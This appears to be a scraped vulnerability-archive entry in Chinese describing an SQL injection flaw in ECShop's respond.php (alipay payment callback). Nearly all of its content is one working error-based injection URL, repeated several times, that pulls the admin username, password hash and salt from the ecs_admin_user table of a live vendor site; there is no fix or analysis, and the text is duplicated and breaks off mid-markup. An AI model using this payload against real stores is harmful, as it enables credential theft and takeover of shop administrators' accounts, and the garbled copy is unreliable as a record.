VULHUB ™

### 简要描述： ecshop展示站注入漏洞 ### 详细说明： ``` http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a ``` [<img src="https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg" alt="ecshop.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg) ### 漏洞证明： ``` http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a ``` [<img...

### 简要描述： ecshop展示站注入漏洞 ### 详细说明： ``` http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a ``` [<img src="https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg" alt="ecshop.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg) ### 漏洞证明： ``` http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a ``` [<img src="https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg" alt="ecshop.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0623324732743a9a6d7546b1b050fd43a863c638.jpg)